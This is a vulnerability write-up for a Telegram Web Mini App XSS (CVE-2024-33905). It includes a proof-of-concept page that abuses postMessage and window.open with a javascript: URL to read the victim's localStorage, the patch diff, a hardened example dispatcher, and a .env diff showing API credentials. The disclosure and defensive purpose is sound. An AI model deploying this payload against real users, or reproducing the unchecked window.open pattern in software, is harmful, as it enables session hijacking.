Telegram Web app XSS/Session Hijacking 1-click [CVE-2024-33905]

pedbap
Apr 28, 2024

This is the technical write up of a severe vulnerability I reported to Telegram’s Bug Bounty program on March 9th, 2024.
Telegram fixed the flaw on March 11th, 2024.

Vulnerable version: Telegram WebK 2.0.0 (486) and below
Fixed version: Telegram WebK 2.0.0 (488)

CVE-2024-33905
https://nvd.nist.gov/vuln/detail/CVE-2024-33905

Attack surface

Telegram Mini Apps

Telegram Mini Apps are essentially web applications that you can run directly within the Telegram messenger interface. Mini Apps support seamless authorization, integrated crypto and fiat payments (via Google Pay and Apple Pay), tailored push notifications, and more.

This attack surface also matters to web3 users, since Mini Apps handle crypto payments through the TON blockchain.

https://ton.org/mini-apps

https://core.telegram.org/bots/webapps

Vulnerability description

A malicious Mini App can execute arbitrary JavaScript in the parent context, web.telegram.org, leading to session hijacking: the PoC below reads the client's localStorage from that origin.
The XSS is triggered through the web_app_open_link event type, sent from the Mini App iframe to the parent page via postMessage.

Files

This is the cached version of the vulnerable file: https://web.telegram.org/k/appDialogsManager-aLs9GOvc.js

https://web.telegram.org/src/components/popups/webApp.ts (now 404 because of the patch)

The vulnerability occurs in the following line:

telegramWebView.addMultipleEventsListeners({
  // [...]
  // the url from the Mini App's message is passed to window.open unchecked
  web_app_open_link: ({url: t}) => { window.open(t, "_blank") }
});

The event web_app_open_link opens a new tab with the URL passed as its argument, without checking the scheme. An attacker can therefore pass a javascript: URL: window.open() evaluates it in the new tab's initial about:blank document, which inherits the origin of the opener (web.telegram.org) rather than the origin of the Mini App iframe, so the script runs with Telegram's origin even though a new tab was opened. The payload javascript:alert(1) is enough to demonstrate the XSS (execution on web.telegram.org just by visiting my Mini App).

The Setup
1. Attacker creates a Bot + Mini App
2. Sets the URL of the Mini App => https://evil.com/homepage.html
3. The exploit is hosted on the homepage of the attacker's site:
3.1. homepage.html

<body onload="exploit()">
<script>
  // The Mini App runs inside an iframe on web.telegram.org. The parent
  // accepts the event without an origin check, so '*' is enough as target.
  function exploit() {
    window.parent.postMessage(JSON.stringify({
      eventType: 'web_app_open_link',
      eventData: {url: "javascript:alert(JSON.stringify(window.parent.localStorage))"}
    }), '*');
  }
</script>
</body>

Exploit Demo

Telegram Patch release

https://github.com/morethanwords/tweb/commit/2153ea9878668769faac8dd5931b7e0b96a9f129/src/components/popups/webApp.ts

      web_app_open_link: ({url}) => {
- window.open(url, '_blank');
+ safeWindowOpen(url);
},
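Review bot: safeWindowOpen(url) still receives the attacker-supplied url unvalidated; the hunk closes the javascript: vector only because the helper's 'noreferrer' feature implies 'noopener', which leaves the new tab without an opener and without the opener's origin. Making that intent explicit would be safer: parse url with new URL() and return early unless parsed.protocol is 'http:' or 'https:' before calling safeWindowOpen(url), so the protection does not rest on a side effect of a window-features flag, and add a comment in safeWindowOpen stating why 'noreferrer' is there so a later cleanup does not drop it.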

safeWindowOpen

export default function safeWindowOpen(url: string) {
  // the 'noreferrer' window feature is what closes the javascript: vector
  window.open(url, '_blank', 'noreferrer');
}

The ‘noreferrer’ window feature does two things here:

  • It stops the new window from sending a Referer header back to the page that opened it.
  • It implies ‘noopener’: the new window gets no window.opener, and its initial document does not inherit the opener's origin. A javascript: navigation is only carried out when the initiator is same-origin with the target document, so the javascript: URL handed to window.open no longer runs in the web.telegram.org context.
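The following is an added example, not code from tweb or from the author of this write-up. It reproduces the postMessage-to-window.open path from the exploit section above as a vulnerable dispatcher, beside a hardened one that puts a scheme check in front of the noopener/noreferrer open that the patch relies on. The event name and the message shape are the page's; the function names (parseWebAppEvent, safeUrlForOpen, vulnerableDispatch, hardenedDispatch), the http/https allowlist and the recording stand-in for window.open are assumptions so that it runs under Node without a browser.

```javascript
// Added example (not tweb's code). Parse the JSON that the embedded Mini App
// posts to the parent frame. Returns null unless it is {eventType, eventData}.
function parseWebAppEvent(raw) {
  let msg;
  try {
    msg = JSON.parse(raw);
  } catch {
    return null;
  }
  if (!msg || typeof msg.eventType !== 'string') return null;
  return { eventType: msg.eventType, eventData: msg.eventData ?? {} };
}

// Assumed allowlist: only these schemes may reach window.open. javascript:,
// data:, vbscript:, blob: and relative paths are all refused.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Returns the normalised URL if its scheme is allowed, otherwise null.
function safeUrlForOpen(url) {
  if (typeof url !== 'string') return null;
  let parsed;
  try {
    // WHATWG URL parsing strips leading/trailing controls and embedded
    // tab/newline and lowercases the scheme, so " JavaScript:" and
    // "java\nscript:" both come out as javascript: and are caught below.
    parsed = new URL(url);
  } catch {
    return null; // relative or unparsable: refuse rather than guess a base
  }
  return ALLOWED_PROTOCOLS.has(parsed.protocol) ? parsed.href : null;
}

// Vulnerable dispatcher: mirrors the pre-patch handler, which passed the
// attacker-controlled url straight to window.open(url, '_blank').
function vulnerableDispatch(raw, open) {
  const ev = parseWebAppEvent(raw);
  if (!ev) return { opened: null, reason: 'bad message' };
  if (ev.eventType === 'web_app_open_link') {
    open(ev.eventData.url, '_blank');
    return { opened: ev.eventData.url, reason: 'opened as-is' };
  }
  return { opened: null, reason: 'unhandled event' };
}

// Hardened dispatcher: validates the scheme first, then opens with
// noopener,noreferrer so the new tab has no opener and inherits no origin.
function hardenedDispatch(raw, open) {
  const ev = parseWebAppEvent(raw);
  if (!ev) return { opened: null, reason: 'bad message' };
  if (ev.eventType === 'web_app_open_link') {
    const url = safeUrlForOpen(ev.eventData.url);
    if (!url) return { opened: null, reason: 'blocked scheme' };
    open(url, '_blank', 'noopener,noreferrer');
    return { opened: url, reason: 'opened' };
  }
  return { opened: null, reason: 'unhandled event' };
}

// Constructed sample: the payload from the write-up's homepage.html.
const PAYLOAD = JSON.stringify({
  eventType: 'web_app_open_link',
  eventData: { url: 'javascript:alert(JSON.stringify(window.parent.localStorage))' },
});

// Stand-in for window.open that records calls instead of opening anything.
function recordingOpen() {
  const calls = [];
  const open = (...args) => { calls.push(args); };
  return { open, calls };
}

// Run both dispatchers over the sample payload.
for (const [name, dispatch] of [['vulnerable', vulnerableDispatch], ['hardened', hardenedDispatch]]) {
  const rec = recordingOpen();
  const result = dispatch(PAYLOAD, rec.open);
  console.log(name, result, rec.calls);
}
```

The scheme check is what makes the hardened path explicit: the vulnerable dispatcher hands the javascript: URL to the sink, the hardened one never calls it, and the noopener,noreferrer features remain as a second layer for anything that does get opened.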

And this is the version-bump commit that shipped the fix (.env):

https://github.com/morethanwords/tweb/commit/b41c5d93ad2f86690dd8dcbd4ca0f66a2273ba06

VITE_API_ID=1025907
VITE_API_HASH=452b0359b988148995f22ff0f4229750
VITE_VERSION=2.0.0
- VITE_VERSION_FULL=2.0.0 (487)
- VITE_BUILD=487
+ VITE_VERSION_FULL=2.0.0 (488)
+ VITE_BUILD=488
VITE_MTPROTO_WORKER=1
VITE_MTPROTO_SW=
VITE_MTPROTO_HTTP=
